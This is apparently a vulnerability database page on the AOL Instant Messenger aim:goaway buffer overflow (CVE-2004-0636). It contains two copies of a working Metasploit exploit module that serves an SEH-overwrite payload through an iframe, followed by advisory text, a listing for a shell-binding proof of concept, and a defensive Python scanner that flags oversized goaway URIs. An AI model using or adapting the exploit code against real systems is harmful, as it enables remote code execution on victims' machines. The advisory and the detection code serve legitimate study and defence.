					'thief <thief@hick.org>'
				],
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2004-0636' ],
					[ 'OSVDB', '8398'    ],
					[ 'BID', '10889'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],
				],
			'Payload'        =>
				{
					'Space'    => 1014,
					'MaxNops'  => 1014,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows NT/2000/XP/2003 Automatic',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x1108118f, # proto.com: pop/pop/ret
								],
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 09 2004'))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Build out the message
		msg =
			make_nops(1014 - p.encoded.length) +     # NOP sled before the payload
			p.encoded +                              # store the payload
			generate_seh_record(target['Rets'][0]) + # set up the SEH frame
			"\x90\xe9\x13\xfc\xff\xff"               # jmp -1000

		# Build the HTML content
		content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- Vulnerability information (F83145)

AOL Instant Messenger goaway Overflow (PacketStormID:F83145)
2009-11-26 00:00:00
skape,thief  metasploit.com
exploit,arbitrary
CVE-2004-0636

This Metasploit module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying an overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server and exploits an SEH overwrite
	#
	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AOL Instant Messenger goaway Overflow',
			'Description'    => %q{
				This module exploits a flaw in the handling of AOL Instant
				Messenger's 'goaway' URI handler.  An attacker can execute 
				arbitrary code by supplying a overly sized buffer as the 
				'message' parameter.  This issue is known to affect AOL Instant 
				Messenger 5.5.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'skape', 
					'thief <thief@hick.org>' 
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2004-0636' ],
					[ 'OSVDB', '8398'    ],
					[ 'BID', '10889'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],
				],
			'Payload'        =>
				{
					'Space'    => 1014,
					'MaxNops'  => 1014,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows NT/2000/XP/2003 Automatic',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x1108118f, # proto.com: pop/pop/ret
								],
						},
					],
				],
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Build out the message
		msg = 
			make_nops(1014 - p.encoded.length) +     # NOP sled before the payload
			p.encoded +                              # store the payload
			generate_seh_record(target['Rets'][0]) + # set up the SEH frame
			"\x90\xe9\x13\xfc\xff\xff"               # jmp -1000

		# Build the HTML content
		content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- Vulnerability information (F34053)

aimAway.c (PacketStormID:F34053)
2004-08-14 00:00:00
mandragore  
exploit,shell,local,proof of concept
CVE-2004-0636

Local proof of concept exploit for AIM 5.5.3595 that makes use of the Away Message vulnerability. Binds a shell to port 1180.

- Vulnerability information

8398
AOL Instant Messenger (AIM) aim:goaway URI Handler goaway Function Away Message Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Upgrade
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in AOL Instant Messenger. Instant Messenger fails to correctly limit the size of the value passed to the goaway function in the away feature, resulting in a buffer overflow. A malicious user can create a specially crafted URI link that uses the 'aim:' handler and a long message value for the goaway parameter and post the link to a web page or email. When a victim clicks on this link, or views an HTML document that invokes this link (such as via an <iframe>), the code included in the malicious URI may overwrite a Structured Exception Handler pointer, which may be used to insert arbitrary code onto the stack. Once on the stack, the arbitrary code could then be executed, resulting in a loss of integrity.
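As a defensive check for the delivery method the CNNVD and OSVDB descriptions above outline (an aim:goaway URI carried in a link, an <iframe> or a mail body), the scanner below is added here and is not code from any of the advisories or exploits on this page. It finds aim:goaway URIs in a document, percent-decodes the 'message' parameter so the length matches what the handler would see, and flags any message over the 1024-byte bound the advisory states; the sample inputs are constructed.

```python
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote_to_bytes

# Bound taken from the advisory text: a 'message' value longer than 1024 bytes
# overruns the buffer in the goaway handler.
MESSAGE_LIMIT = 1024

# Matches an aim:goaway URI wherever it appears in a document (href, iframe
# src, plain text).  The match stops at whitespace, quotes and angle brackets,
# which is where an HTML attribute value ends.
AIM_GOAWAY_RE = re.compile(rb"aim:(?://)?goaway\?[^\s\"'<>]+", re.IGNORECASE)


@dataclass
class Finding:
    uri_prefix: str    # first bytes of the URI, for the alert text
    message_len: int   # length of the decoded 'message' value in bytes
    overflow: bool     # True when message_len exceeds MESSAGE_LIMIT
    binary: bool       # True when the decoded message holds non-printable bytes


def decode_message(uri: bytes) -> bytes:
    """Return the percent-decoded 'message' query parameter of an aim: URI."""
    query = uri.split(b"?", 1)[1]
    for pair in query.split(b"&"):
        key, _, value = pair.partition(b"=")
        if key.lower() == b"message":
            # Decode %XX escapes so the length reflects what the handler sees.
            return unquote_to_bytes(value)
    return b""


def scan_for_goaway_overflow(document: bytes) -> List[Finding]:
    """Inspect an HTML page or mail body for oversized aim:goaway URIs."""
    findings = []
    for match in AIM_GOAWAY_RE.finditer(document):
        uri = match.group(0)
        message = decode_message(uri)
        findings.append(Finding(
            uri_prefix=uri[:32].decode("ascii", "replace"),
            message_len=len(message),
            overflow=len(message) > MESSAGE_LIMIT,
            binary=any(b < 0x20 or b > 0x7E for b in message),
        ))
    return findings


def is_exploit_attempt(document: bytes) -> bool:
    """True when any aim:goaway URI in the document would overflow the handler."""
    return any(f.overflow for f in scan_for_goaway_overflow(document))


# Constructed sample inputs (not taken from any real capture).
BENIGN = b"<a href='aim:goaway?message=back+in+5'>Set away</a>"
# Hidden iframe carrying an oversized message, the delivery method the
# advisories describe; the message here is plain filler bytes.
HOSTILE = (b"<html><body>Some fake web page or email...\n"
           b"<iframe width=0 height=0 src=\"aim:goaway?message="
           + b"A" * 1100 + b"\"></iframe></body></html>")
# Percent-encoded message: 1200 raw bytes but only 400 after decoding, so a
# raw-length check would raise a false alarm here.
ENCODED_BENIGN = b"<iframe src='aim:goaway?message=" + b"%41" * 400 + b"'>"

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("hostile", HOSTILE),
                      ("encoded", ENCODED_BENIGN)):
        for finding in scan_for_goaway_overflow(doc):
            print(f"{name}: {finding}")
```

The same check fits a mail gateway or web proxy filter; the `binary` flag is a secondary signal, since a legitimate away message is printable text.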

- Timeline

2004-08-09 2004-06-16
2004-08-09 Unknown

- Solution

Upgrade to version 5.9 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: delete the registry key HKEY_CLASSES_ROOT\aim. This will only affect the current session; the key will be restored the next time AOL Instant Messenger is started, at which time the workaround will need to be reapplied.

- Related references

- Vulnerability author

- Vulnerability information

AOL Instant Messenger Away Message Remote Buffer Overflow Vulnerability
Boundary Condition Error 10889
Yes No
2004-08-09 12:00:00 2009-07-12 06:16:00
Discovery is credited to Ryan McGeehan and Kevin Benes. Matt Murphy is credited with discovery as well.

- Affected program versions

AOL Instant Messenger 5.5.3595
AOL Instant Messenger 5.5.3415 Beta
AOL Instant Messenger 5.5

- Vulnerability discussion

AOL Instant Messenger is reported prone to a remote buffer overflow vulnerability when processing a malformed 'Away' message. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access.

AOL Instant Messenger versions 5.5.3595 and 5.5 are reported vulnerable to this issue, however, other versions may be affected as well.

- Exploitation

Proof of concept code has been published. John Bissell A.K.A. HighT1mes has also released an exploit designed to leverage this issue.

An exploit has been released as part of the MetaSploit Framework 2.3.

- Solution

AOL has released a new version of Instant Messenger to address this issue. Instant Messenger versions released on and subsequent to August 9, 2004 are not vulnerable.

- Related references